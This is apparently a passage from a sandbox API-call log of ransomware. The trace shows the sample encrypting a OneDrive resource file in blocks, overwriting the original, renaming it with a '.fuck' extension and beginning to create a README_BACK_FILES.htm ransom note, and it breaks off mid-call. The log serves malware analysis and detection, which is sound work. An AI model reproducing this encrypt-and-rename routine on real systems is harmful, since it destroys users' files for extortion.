returned 1 [0276.527] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.527] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.527] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.527] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.528] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.528] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.528] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.528] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.528] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.528] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.528] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.528] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.528] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.528] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.528] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.528] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.528] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.529] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.529] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.529] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.529] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.529] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.529] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.529] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.529] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.529] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.529] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.529] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.529] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.529] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.529] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.530] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.530] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.530] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.530] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.530] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.530] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.530] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.530] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.530] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.530] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.531] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.531] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.531] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.531] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.531] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.531] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.531] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.531] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.531] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.531] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.531] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.532] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.532] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.532] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.532] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.532] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.532] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.532] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.532] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.532] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.532] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.532] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.532] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.532] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.533] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.533] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.533] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.533] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.533] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.533] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.533] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.533] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.533] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.533] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.533] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.533] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.533] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.533] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.534] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.534] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.534] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.534] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x248, lpOverlapped=0x0) returned 1 [0276.534] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x248, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x250) returned 1 [0276.534] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x250, lpOverlapped=0x0) returned 1 [0276.534] CloseHandle (hObject=0x5d48) returned 1 [0276.534] CloseHandle (hObject=0x5d3c) returned 1 [0276.534] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hr\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hr\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0276.548] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0276.549] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hr\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0276.551] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hr\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hr\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0276.552] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0276.552] CryptDestroyKey (hKey=0x2fb488) returned 1 [0276.552] CryptReleaseContext (hProv=0x2f2a960, dwFlags=0x0) returned 1 [0276.552] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0276.553] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0276.553] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hr\\readme_back_files.htm")) returned 0xffffffff [0276.553] AreFileApisANSI () returned 1 [0276.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889418, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0276.553] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\hr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, 